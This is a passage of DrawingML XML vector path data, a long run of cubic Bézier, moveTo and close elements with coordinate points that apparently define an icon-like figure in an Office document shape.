                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="71" y="199"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="196"/>
                      <a:pt x="4" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="8" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="16"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="159" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="158" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="157"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="84" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>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4"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="157"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="185"/>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8"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>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4"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="36"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="100" y="38"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="106" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="44"/>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0"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="70" y="36"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
